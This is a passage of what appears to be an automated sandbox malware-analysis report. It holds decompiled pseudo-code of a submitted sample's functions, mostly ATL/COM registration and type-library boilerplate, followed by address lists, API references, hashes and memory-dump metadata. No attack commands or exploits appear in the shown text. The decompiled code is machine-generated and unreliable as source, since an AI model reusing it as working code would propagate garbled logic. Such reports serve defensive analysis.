															__eflags = _t239;
															if(_t239 >= 0) {
																__eflags = _v16 - 0x400;
																if(__eflags > 0) {
																	L54:
																	_v476 = E0094F270(_t287,  &_v40, __eflags, _v16);
																	L55:
																	_t317 = _v16 >> 1;
																	__eflags = _v16 >> 1;
																	_v464 = E00941AC0(_v16 >> 1, _t377, _v476, _v32, _t317, _v24);
																	L56:
																	_v460 = _v464;
																	L57:
																	_t344 = _v460;
																	_v352 = _t344;
																	__eflags = _v352;
																	if(_v352 != 0) {
																		_t377 = _t382;
																		__imp__#161(_v352, _a16);
																		__eflags = _t382 - _t382;
																		_v356 = E009D1520(_a16, _t382 - _t382);
																		goto L60;
																	}
																	_v400 = 0x8007000e;
																	E0094F220( &_v40);
																	_t205 = _v400;
																	goto L64;
																}
																_t247 = E00941900(__eflags, _v16);
																_t382 = _t382 + 4;
																__eflags = _t247 & 0x000000ff;
																if(__eflags == 0) {
																	goto L54;
																}
																_v468 = _v16 + 0x24;
																E009CF1D0(_v468);
																_v472 = _t382;
																E009D13A0(_v472, _v468,  &_v412);
																_v472 = _v472 + 0x20;
																_v476 = _v472;
																goto L55;
															}
															_v464 = 0;
															goto L56;
														}
														_v460 = 0;
														goto L57;
													}
													_v396 = 0x80004005;
													E0094F220( &_v40);
													_t205 = _v396;
													goto L64;
												}
												_v392 = 0x8007000e;
												E0094F220( &_v40);
												_t205 = _v392;
												goto L64;
											}
											_t255 = E00941900(__eflags, _v16);
											_t382 = _t382 + 4;
											__eflags = _t255 & 0x000000ff;
											if(__eflags == 0) {
												goto L39;
											}
											_v448 = _v16 + 0x24;
											E009CF1D0(_v448);
											_v452 = _t382;
											E009D13A0(_v452, _v448,  &_v412);
											_v452 = _v452 + 0x20;
											_v456 = _v452;
											goto L40;
										}
										_v444 = 0;
										goto L41;
									}
									_v440 = 0;
									goto L42;
								}
								_v28 = _a8;
								__eflags = _v28;
								if(__eflags != 0) {
									_v16 = E00995A70(_v28) + 1;
									_t263 = E00941780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
									_t382 = _t382 + 0x10;
									__eflags = _t263;
									if(_t263 >= 0) {
										__eflags = _v16 - 0x400;
										if(__eflags > 0) {
											L22:
											_v436 = E0094F270(_t287,  &_v40, __eflags, _v16);
											L23:
											_v424 = E00941BB0(_v16, _t377, _v436, _v28, _v16, _v24);
											L24:
											_v420 = _v424;
											L25:
											_t344 = _v420;
											_v340 = _t344;
											__eflags = _v340;
											if(_v340 != 0) {
												_t269 = E00992E00(_v340);
												_t387 = _t382 + 4;
												_v344 = _t269;
												_v348 = _v328 + _v344;
												_t344 = _v348;
												__eflags = _t344 - _v328;
												if(_t344 < _v328) {
													L30:
													_v388 = 0x80004005;
													E0094F220( &_v40);
													_t205 = _v388;
													goto L64;
												}
												__eflags = _v348 - _v344;
												if(_v348 < _v344) {
													goto L30;
												}
												__eflags = _v348 - 0x10e;
												if(_v348 < 0x10e) {
													__eflags = 0x10e;
													E009426C0(_t287, _t376, _t377, 0x10e, _t378 + _v328 - 0x13c, 0x10e - _v328, _v340);
													_t382 = _t387 + 0xc;
													goto L32;
												}
												goto L30;
											}
											_v384 = 0x8007000e;
											E0094F220( &_v40);
											_t205 = _v384;
											goto L64;
										}
										_t276 = E00941900(__eflags, _v16);
										_t382 = _t382 + 4;
										__eflags = _t276 & 0x000000ff;
										if(__eflags == 0) {
											goto L22;
										}
										_v428 = _v16 + 0x24;
										E009CF1D0(_v428);
										_v432 = _t382;
										E009D13A0(_v432, _v428,  &_v412);
										_v432 = _v432 + 0x20;
										_v436 = _v432;
										goto L23;
									}
									_v424 = 0;
									goto L24;
								}
								_v420 = 0;
								goto L25;
							}
							_v380 = E00941710( &_v320, 0x7a);
							E0094F220( &_v40);
							_t205 = _v380;
							goto L64;
						} else {
							_v332 = E00942DC0( &_v320, _t377);
							_v376 = _v332;
							E0094F220( &_v40);
							_t205 = _v376;
							L64:
							E009D13E0(_t287, _t378, 0x94a8d8, _v412);
							_t207 = _t205;
							_t346 = _t344;
							return E00957280(_t207, _t287, _v8 ^ _t378, _t346, _t376, _t377);
						}
					}
				}
				_t390 = _a16;
				if(_a16 != 0) {
					goto L4;
				}
				goto L2;
			}












































































                      0x0094a1d0
                      0x0094a1db
                      0x0094a1eb
                      0x0094a1eb
                      0x0094a1eb
                      0x0094a1ed
                      0x0094a1f4
                      0x0094a1f7
                      0x0094a205
                      0x0094a20d
                      0x0094a225
                      0x0094a22a
                      0x0094a230
                      0x0094a232
                      0x0094a232
                      0x0094a233
                      0x0094a237
                      0x0094a23f
                      0x00000000
                      0x0094a249
                      0x0094a24c
                      0x0094a255
                      0x0094a25b
                      0x0094a267
                      0x0094a26a
                      0x0094a271
                      0x0094a27b
                      0x0094a280
                      0x0094a284
                      0x0094a29e
                      0x0094a2a3
                      0x0094a2a6
                      0x0094a2a9
                      0x0094a2ab
                      0x0094a2ab
                      0x0094a2a9
                      0x0094a2ac
                      0x0094a2ba
                      0x0094a2be
                      0x0094a2c4
                      0x0094a2cb
                      0x0094a2d1
                      0x0094a2d8
                      0x0094a306
                      0x0094a310
                      0x0094a335
                      0x0094a346
                      0x0094a34b
                      0x0094a34e
                      0x0094a354
                      0x0094a358
                      0x0094a519
                      0x0094a51f
                      0x0094a522
                      0x0094a526
                      0x0094a546
                      0x0094a553
                      0x0094a558
                      0x0094a55b
                      0x0094a55d
                      0x0094a56e
                      0x0094a575
                      0x0094a5d4
                      0x0094a5e0
                      0x0094a5e6
                      0x0094a5ed
                      0x0094a5ed
                      0x0094a600
                      0x0094a606
                      0x0094a60c
                      0x0094a612
                      0x0094a612
                      0x0094a618
                      0x0094a61e
                      0x0094a625
                      0x0094a644
                      0x0094a651
                      0x0094a657
                      0x0094a65e
                      0x0094a664
                      0x0094a66b
                      0x0094a835
                      0x0094a835
                      0x0094a83c
                      0x0094a83e
                      0x0094a847
                      0x0094a84d
                      0x0094a857
                      0x0094a859
                      0x0094a85c
                      0x0094a85f
                      0x0094a861
                      0x0094a877
                      0x0094a87a
                      0x0094a87d
                      0x0094a87f
                      0x0094a881
                      0x0094a889
                      0x0094a889
                      0x0094a85f
                      0x0094a895
                      0x0094a89e
                      0x0094a8a3
                      0x00000000
                      0x0094a8a3
                      0x0094a671
                      0x0094a677
                      0x0094a67d
                      0x0094a682
                      0x0094a68e
                      0x0094a699
                      0x0094a69f
                      0x0094a6e2
                      0x0094a6e7
                      0x0094a6f0
                      0x0094a6f3
                      0x0094a6f7
                      0x0094a717
                      0x0094a724
                      0x0094a729
                      0x0094a72c
                      0x0094a72e
                      0x0094a73f
                      0x0094a746
                      0x0094a7a5
                      0x0094a7b1
                      0x0094a7b7
                      0x0094a7be
                      0x0094a7be
                      0x0094a7d1
                      0x0094a7d7
                      0x0094a7dd
                      0x0094a7e3
                      0x0094a7e3
                      0x0094a7e9
                      0x0094a7ef
                      0x0094a7f6
                      0x0094a815
                      0x0094a822
                      0x0094a828
                      0x0094a82f
                      0x00000000
                      0x0094a82f
                      0x0094a7f8
                      0x0094a805
                      0x0094a80a
                      0x00000000
                      0x0094a80a
                      0x0094a74c
                      0x0094a751
                      0x0094a757
                      0x0094a759
                      0x00000000
                      0x00000000
                      0x0094a761
                      0x0094a76d
                      0x0094a772
                      0x0094a78b
                      0x0094a790
                      0x0094a79d
                      0x00000000
                      0x0094a79d
                      0x0094a730
                      0x00000000
                      0x0094a730
                      0x0094a6f9
                      0x00000000
                      0x0094a6f9
                      0x0094a6a1
                      0x0094a6ae
                      0x0094a6b3
                      0x00000000
                      0x0094a6b3
                      0x0094a627
                      0x0094a634
                      0x0094a639
                      0x00000000
                      0x0094a639
                      0x0094a57b
                      0x0094a580
                      0x0094a586
                      0x0094a588
                      0x00000000
                      0x00000000
                      0x0094a590
                      0x0094a59c
                      0x0094a5a1
                      0x0094a5ba
                      0x0094a5bf
                      0x0094a5cc
                      0x00000000
                      0x0094a5cc
                      0x0094a55f
                      0x00000000
                      0x0094a55f
                      0x0094a528
                      0x00000000
                      0x0094a528
                      0x0094a361
                      0x0094a364
                      0x0094a368
                      0x0094a388
                      0x0094a395
                      0x0094a39a
                      0x0094a39d
                      0x0094a39f
                      0x0094a3b0
                      0x0094a3b7
                      0x0094a416
                      0x0094a422
                      0x0094a428
                      0x0094a440
                      0x0094a446
                      0x0094a44c
                      0x0094a452
                      0x0094a452
                      0x0094a458
                      0x0094a45e
                      0x0094a465
                      0x0094a48b
                      0x0094a490
                      0x0094a493
                      0x0094a4a5
                      0x0094a4ab
                      0x0094a4b1
                      0x0094a4b7
                      0x0094a4d3
                      0x0094a4d3
                      0x0094a4e0
                      0x0094a4e5
                      0x00000000
                      0x0094a4e5
                      0x0094a4bf
                      0x0094a4c5
                      0x00000000
                      0x00000000
                      0x0094a4c7
                      0x0094a4d1
                      0x0094a4fc
                      0x0094a511
                      0x0094a516
                      0x00000000
                      0x0094a516
                      0x00000000
                      0x0094a4d1
                      0x0094a467
                      0x0094a474
                      0x0094a479
                      0x00000000
                      0x0094a479
                      0x0094a3bd
                      0x0094a3c2
                      0x0094a3c8
                      0x0094a3ca
                      0x00000000
                      0x00000000
                      0x0094a3d2
                      0x0094a3de
                      0x0094a3e3
                      0x0094a3fc
                      0x0094a401
                      0x0094a40e
                      0x00000000
                      0x0094a40e
                      0x0094a3a1
                      0x00000000
                      0x0094a3a1
                      0x0094a36a
                      0x00000000
                      0x0094a36a
                      0x0094a31c
                      0x0094a325
                      0x0094a32a
                      0x00000000
                      0x0094a2da
                      0x0094a2df
                      0x0094a2eb
                      0x0094a2f4
                      0x0094a2f9
                      0x0094a8a9
                      0x0094a8b9
                      0x0094a8be
                      0x0094a8bf
                      0x0094a8d5
                      0x0094a8d5
                      0x0094a2d8
                      0x0094a237
                      0x0094a207
                      0x0094a20b
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?), ref: 0094A2BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: FileModuleName
                      • String ID: $ $ $%ls$.tlb$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hInstTypeLib != 0$pbstrPath != 0 && ppTypeLib != 0
                      • API String ID: 514040917-3249255110
                      • Opcode ID: 1149041f190565dd23c0b4b518c32bd9ee4fa26a2b9718e2e3ad8ea139221881
                      • Instruction ID: 12df4d702f1efc2cf1191ae3a81961017af6206c613f91d1cb7d57dc4383e876
                      • Opcode Fuzzy Hash: 1149041f190565dd23c0b4b518c32bd9ee4fa26a2b9718e2e3ad8ea139221881
                      • Instruction Fuzzy Hash: 181215B5D402189FDB24DF94DC95BEEB3B4BB88304F1081E9E509AB241DB759E84CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00962940 Relevance: 33.2, APIs: 22, Instructions: 210COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00962940(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char* _t80;
				intOrPtr _t109;
				intOrPtr _t119;
				char _t123;
				void* _t131;
				intOrPtr _t169;
				char* _t177;
				void* _t181;
				void* _t182;
				void* _t183;

				_t182 = __esi;
				_t181 = __edi;
				_t131 = __ebx;
				_t80 =  *0xb30640; // 0x0
				if( *_t80 == 0) {
					if(E0096A560(_a8) != 0) {
						_v56 = E0095F270( &_v204, 0x5b);
						_v60 = E0095FC30(_v56,  &_v212, 1);
						E00962CD0(_a4, E0095FBB0(_v60,  &_v220, 0x5d));
						return _a4;
					}
					_v84 = E00960060(")[", 2);
					_v80 = _t169;
					_v44 = E0095FAD0( &_v172, 0x28, _a8);
					_v48 = E0095FB30(_v44,  &_v180,  &_v84);
					_v52 = E0095FC30(_v48,  &_v188, 1);
					E00962CD0(_a4, E0095FBB0(_v52,  &_v196, 0x5d));
					return _a4;
				}
				_v8 = E00965D80();
				if(_v8 < 0) {
					_v8 = 0;
				}
				if(_v8 != 0) {
					E0095F3F0( &_v16);
					if(E0096A520(_a8) != 0) {
						_t123 = E00960060(0x9d8da8, 2);
						_t183 = _t183 + 8;
						_v68 = _t123;
						_v64 = _t169;
						E0095FCA0( &_v16,  &_v68);
					}
					while(E0096A6C0( &_v16) != 0) {
						_v28 = _v8;
						_v8 = _v8 - 1;
						if(_v28 == 0) {
							break;
						}
						_t177 =  *0xb30640; // 0x0
						if( *_t177 == 0) {
							break;
						}
						_t119 = E0095FAD0( &_v124, 0x5b, E00964900(_t131, _t181, _t182,  &_v116, 0));
						_t183 = _t183 + 0x14;
						_v32 = _t119;
						E0095FD40( &_v16, E0095FBB0(_v32,  &_v132, 0x5d));
					}
					if(E0096A560(_a8) == 0) {
						if(E0096A520(_a8) == 0) {
							_t109 = E0095FAD0( &_v148, 0x28, _a8);
							_t183 = _t183 + 0xc;
							_v36 = _t109;
							_v40 = E0095FBB0(_v36,  &_v156, 0x29);
							E0095F820( &_v16, E0095FB70(_v40,  &_v164,  &_v16));
						} else {
							E0095F820( &_v16, E0095FB70(_a8,  &_v140,  &_v16));
						}
					}
					E00966AB0(_t131, _t181, _t182,  &_v76,  &_v16);
					E0096AA80( &_v76);
					E0095F240(_a4,  &_v76);
					return _a4;
				}
				_v20 = E0095F270( &_v92, 0x5b);
				_v24 = E0095FC30(_v20,  &_v100, 1);
				E00962CD0(_a4, E0095FBB0(_v24,  &_v108, 0x5d));
				return _a4;
			}
















































                      0x00962940
                      0x00962940
                      0x00962940
                      0x00962949
                      0x00962953
                      0x00962b0f
                      0x00962b9a
                      0x00962bae
                      0x00962bc7
                      0x00000000
                      0x00962bcf
                      0x00962b20
                      0x00962b23
                      0x00962b3b
                      0x00962b51
                      0x00962b65
                      0x00962b7e
                      0x00000000
                      0x00962b86
                      0x0096295e
                      0x00962965
                      0x00962967
                      0x00962967
                      0x00962972
                      0x009629bd
                      0x009629cc
                      0x009629d5
                      0x009629da
                      0x009629dd
                      0x009629e0
                      0x009629ea
                      0x009629ea
                      0x009629ef
                      0x009629fe
                      0x00962a07
                      0x00962a0e
                      0x00000000
                      0x00000000
                      0x00962a10
                      0x00962a1b
                      0x00000000
                      0x00000000
                      0x00962a32
                      0x00962a37
                      0x00962a3a
                      0x00962a4f
                      0x00962a4f
                      0x00962a60
                      0x00962a6c
                      0x00962a99
                      0x00962a9e
                      0x00962aa1
                      0x00962ab5
                      0x00962acf
                      0x00962a6e
                      0x00962a85
                      0x00962a85
                      0x00962a6c
                      0x00962adc
                      0x00962ae7
                      0x00962af3
                      0x00000000
                      0x00962af8
                      0x0096297e
                      0x0096298f
                      0x009629a5
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::operator+$EmptyName::isoperator+
                      • String ID:
                      • API String ID: 2054230242-0
                      • Opcode ID: cafd6eddd1dd8d49ed67f22b918b25518aed7eb6b66d05279d9b1294f4d7a022
                      • Instruction ID: 87e2396baf35698cadfc7b04b7b2430cbb91f32699e6ba16fbb11f03b4d1e71f
                      • Opcode Fuzzy Hash: cafd6eddd1dd8d49ed67f22b918b25518aed7eb6b66d05279d9b1294f4d7a022
                      • Instruction Fuzzy Hash: C3811F71D00208AFDB14EFA5DCA2FFE7779AF84311F508169F909AB191EB706A48CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00947640 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 337COMMON
                      Download Yara Rule
                      C-Code - Quality: 78%
                      			E00947640(void* __ebx, void* __ecx) {
				signed int _v8;
				void* _v12;
				CHAR* _v20;
				intOrPtr _v28;
				signed int _v32;
				CHAR* _v36;
				char _v44;
				char _v312;
				struct HINSTANCE__* _v320;
				intOrPtr _v324;
				signed int _v328;
				char _v594;
				char _v596;
				void* _v608;
				signed int _v616;
				struct _SHFILEINFOA _v972;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				signed int _v992;
				signed int _v996;
				signed int _v1000;
				signed int _v1004;
				CHAR* _v1012;
				CHAR* _v1020;
				CHAR* _v1024;
				char* _v1028;
				intOrPtr _v1032;
				char _v1036;
				void* _v1044;
				void* __edx;
				void* __edi;
				void* __esi;
				signed int _t131;
				void* _t145;
				void* _t149;
				signed int _t156;
				void* _t161;
				void* _t164;
				long _t168;
				signed int _t169;
				void* _t172;
				intOrPtr _t176;
				void* _t178;
				void* _t181;
				void* _t184;
				signed char _t188;
				struct HINSTANCE__* _t196;
				void* _t197;
				void* _t200;
				void* _t206;
				intOrPtr* _t210;
				short _t247;
				signed int _t251;
				void* _t260;
				intOrPtr* _t261;
				void* _t267;
				void* _t268;
				signed int _t276;
				void* _t277;
				intOrPtr _t278;

				_t206 = __ebx;
				_push(__ecx);
				_t267 =  &_v1036;
				memset(_t267, 0xcccccccc, 0x102 << 2);
				_t278 = _t277 + 0xc;
				_t268 = _t267 + 0x102;
				_pop(_t210);
				_t131 =  *0xa0600c; // 0x5d529087
				_v8 = _t131 ^ _t276;
				_v12 = _t210;
				_v1012 = 0;
				_v20 = 0;
				_v28 = E00941AB0();
				_v32 = 0;
				_v36 = 0;
				E0094F2E0( &_v44);
				_v320 = E00942B10(0xb30220);
				_t269 = _t278;
				_t213 = _v320;
				_v324 = E009D1520(GetModuleFileNameA(_v320,  &_v312, 0x104), _t278 - _t278);
				if(_v324 != 0) {
					__eflags = _v324 - 0x104;
					if(_v324 != 0x104) {
						__eflags = _v320;
						if(_v320 == 0) {
							L6:
							_t247 = "\""; // 0x22
							_v596 = _t247;
							E0095AF80(_t268,  &_v594, 0, 0x104);
							E009427B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106,  &_v312);
							E009427B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106, "\"");
							_t278 = _t278 + 0x24;
							_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v596);
							__eflags = _t278 - _t278;
							_v328 = E009D1520(_t145, _t278 - _t278);
							L8:
							__eflags = _v328;
							if(_v328 >= 0) {
								_t251 =  *_v12;
								_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x14))))(_v12, "Module_Raw",  &_v312);
								__eflags = _t278 - _t278;
								_v328 = E009D1520(_t149, _t278 - _t278);
								__eflags = _v328;
								if(_v328 >= 0) {
									_t272 = _t278;
									__imp__StringFromCLSID(0xb33678,  &_v608);
									__eflags = _t278 - _t278;
									_v328 = E009D1520( &_v608, _t278 - _t278);
									__eflags = _v328;
									if(_v328 >= 0) {
										_v32 = _v608;
										__eflags = _v32;
										if(__eflags != 0) {
											_v20 = E00995A70(_v32) + 1;
											_t156 = E00941780( &_v20, _t272, __eflags,  &_v20, _v20, 2);
											_t278 = _t278 + 0x10;
											__eflags = _t156;
											if(_t156 >= 0) {
												__eflags = _v20 - 0x400;
												if(__eflags > 0) {
													L21:
													_v1036 = E0094F270(_t206,  &_v44, __eflags, _v20);
													L22:
													_v1024 = E00941BB0(_v20, _t272, _v1036, _v32, _v20, _v28);
													L23:
													_v1020 = _v1024;
													L24:
													_v616 = _v1020;
													do {
														__eflags = _v616;
														if(__eflags == 0) {
															_t161 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xcd, 0, "%ls", L"pszModuleGUID != 0");
															_t278 = _t278 + 0x18;
															__eflags = _t161 - 1;
															if(_t161 == 1) {
																asm("int3");
															}
														}
														__eflags = 0;
													} while (0 != 0);
													_t164 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "MODULEGUID", _v616);
													__eflags = _t278 - _t278;
													_v328 = E009D1520(_t164, _t278 - _t278);
													_t274 = _t278;
													__imp__CoTaskMemFree(_v608);
													__eflags = _t278 - _t278;
													E009D1520(_t165, _t278 - _t278);
													__eflags = _v328;
													if(_v328 >= 0) {
														_t168 = SHGetFileInfoA( &_v312, 0,  &_v972, 0x160, 0x2000);
														__eflags = _t278 - _t278;
														_t169 = E009D1520(_t168, _t278 - _t278);
														__eflags = _t169;
														if(_t169 != 0) {
															_t274 = _t278;
															_t251 = _v12;
															_t172 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_t251, "MODULETYPE", "LocalServer32");
															__eflags = _t278 - _t278;
															_v328 = E009D1520(_t172, _t278 - _t278);
														} else {
															_t274 = _t278;
															_t251 =  *((intOrPtr*)( *_v12 + 0x14));
															_t184 =  *_t251(_v12, "MODULETYPE", "InprocServer32");
															__eflags = _t278 - _t278;
															_v328 = E009D1520(_t184, _t278 - _t278);
														}
														__eflags = _v328;
														if(_v328 >= 0) {
															_t274 = _t278;
															_t261 =  *0xb315ec; // 0xb336c0
															_t251 =  *((intOrPtr*)( *_t261 + 0x14));
															_t181 =  *_t251(_v12);
															__eflags = _t278 - _t278;
															_v328 = E009D1520(_t181, _t278 - _t278);
														}
														_v1004 = _v328;
														E0094F220( &_v44);
														_t176 = _v1004;
													} else {
														_t251 = _v328;
														_v1000 = _t251;
														E0094F220( &_v44);
														_t176 = _v1000;
													}
													goto L37;
												}
												_t188 = E00941900(__eflags, _v20);
												_t278 = _t278 + 4;
												__eflags = _t188 & 0x000000ff;
												if(__eflags == 0) {
													goto L21;
												}
												_v1028 =  &(_v20[0x24]);
												E009CF1D0(_v1028);
												_v1032 = _t278;
												E009D13A0(_v1032, _v1028,  &_v1012);
												_v1032 = _v1032 + 0x20;
												_v1036 = _v1032;
												goto L22;
											}
											_v1024 = 0;
											goto L23;
										}
										_v1020 = 0;
										goto L24;
									}
									_v996 = _v328;
									E0094F220( &_v44);
									_t176 = _v996;
									goto L37;
								}
								_t251 = _v328;
								_v992 = _t251;
								E0094F220( &_v44);
								_t176 = _v992;
								goto L37;
							}
							_t251 = _v328;
							_v988 = _t251;
							E0094F220( &_v44);
							_t176 = _v988;
							goto L37;
						}
						_t269 = _t278;
						_t196 = GetModuleHandleA(0);
						__eflags = _t278 - _t278;
						_t197 = E009D1520(_t196, _t278 - _t278);
						__eflags = _v320 - _t197;
						if(_v320 != _t197) {
							_t274 = _t278;
							_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v312);
							__eflags = _t278 - _t278;
							_v328 = E009D1520(_t200, _t278 - _t278);
							goto L8;
						}
						goto L6;
					}
					_v984 = E00941710(_t213, 0x7a);
					E0094F220( &_v44);
					_t176 = _v984;
					goto L37;
				} else {
					_v980 = E00942DC0(_t213, _t269);
					E0094F220( &_v44);
					_t176 = _v980;
					L37:
					E009D13E0(_t206, _t276, 0x947b50, _v1012);
					_t178 = _t176;
					_t260 = _t251;
					return E00957280(_t178, _t206, _v8 ^ _t276, _t260, _t268, _t274);
				}
			}
































































                      0x00947640
                      0x0094764b
                      0x0094764c
                      0x0094765c
                      0x0094765c
                      0x0094765c
                      0x0094765e
                      0x0094765f
                      0x00947666
                      0x00947669
                      0x0094766c
                      0x00947676
                      0x00947682
                      0x00947685
                      0x0094768c
                      0x00947696
                      0x009476a5
                      0x009476ab
                      0x009476b9
                      0x009476cd
                      0x009476da
                      0x009476fc
                      0x00947706
                      0x0094772b
                      0x00947732
                      0x00947751
                      0x00947751
                      0x00947758
                      0x0094776d
                      0x00947788
                      0x009477a1
                      0x009477a6
                      0x009477c3
                      0x009477c5
                      0x009477cc
                      0x009477fd
                      0x009477fd
                      0x00947804
                      0x00947836
                      0x0094783f
                      0x00947841
                      0x00947848
                      0x0094784e
                      0x00947855
                      0x00947876
                      0x00947884
                      0x0094788a
                      0x00947891
                      0x00947897
                      0x0094789e
                      0x009478c5
                      0x009478c8
                      0x009478cc
                      0x009478ec
                      0x009478f9
                      0x009478fe
                      0x00947901
                      0x00947903
                      0x00947914
                      0x0094791b
                      0x0094797a
                      0x00947986
                      0x0094798c
                      0x009479a4
                      0x009479aa
                      0x009479b0
                      0x009479b6
                      0x009479bc
                      0x009479c2
                      0x009479c2
                      0x009479c9
                      0x009479e3
                      0x009479e8
                      0x009479eb
                      0x009479ee
                      0x009479f0
                      0x009479f0
                      0x009479ee
                      0x009479f1
                      0x009479f1
                      0x00947a0f
                      0x00947a11
                      0x00947a18
                      0x00947a1e
                      0x00947a27
                      0x00947a2d
                      0x00947a2f
                      0x00947a34
                      0x00947a3b
                      0x00947a78
                      0x00947a7e
                      0x00947a80
                      0x00947a85
                      0x00947a87
                      0x00947ab2
                      0x00947ac3
                      0x00947aca
                      0x00947acc
                      0x00947ad3
                      0x00947a89
                      0x00947a89
                      0x00947a9e
                      0x00947aa1
                      0x00947aa3
                      0x00947aaa
                      0x00947aaa
                      0x00947ad9
                      0x00947ae0
                      0x00947ae2
                      0x00947ae8
                      0x00947af6
                      0x00947af9
                      0x00947afb
                      0x00947b02
                      0x00947b02
                      0x00947b0e
                      0x00947b17
                      0x00947b1c
                      0x00947a3d
                      0x00947a3d
                      0x00947a43
                      0x00947a4c
                      0x00947a51
                      0x00947a51
                      0x00000000
                      0x00947a3b
                      0x00947921
                      0x00947926
                      0x0094792c
                      0x0094792e
                      0x00000000
                      0x00000000
                      0x00947936
                      0x00947942
                      0x00947947
                      0x00947960
                      0x00947965
                      0x00947972
                      0x00000000
                      0x00947972
                      0x00947905
                      0x00000000
                      0x00947905
                      0x009478ce
                      0x00000000
                      0x009478ce
                      0x009478a6
                      0x009478af
                      0x009478b4
                      0x00000000
                      0x009478b4
                      0x00947857
                      0x0094785d
                      0x00947866
                      0x0094786b
                      0x00000000
                      0x0094786b
                      0x00947806
                      0x0094780c
                      0x00947815
                      0x0094781a
                      0x00000000
                      0x0094781a
                      0x00947734
                      0x00947738
                      0x0094773e
                      0x00947740
                      0x00947745
                      0x0094774b
                      0x009477d4
                      0x009477ee
                      0x009477f0
                      0x009477f7
                      0x00000000
                      0x009477f7
                      0x00000000
                      0x0094774b
                      0x00947712
                      0x0094771b
                      0x00947720
                      0x00000000
                      0x009476dc
                      0x009476e1
                      0x009476ea
                      0x009476ef
                      0x00947b22
                      0x00947b32
                      0x00947b37
                      0x00947b38
                      0x00947b4e
                      0x00947b4e

                      APIs
                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 009476C0
                      • _HRESULT_FROM_WIN32.LIBCMTD ref: 0094770A
                        • Part of subcall function 00942DC0: GetLastError.KERNEL32 ref: 00942DCE
                        • Part of subcall function 00942DC0: _HRESULT_FROM_WIN32.LIBCMTD ref: 00942DE2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
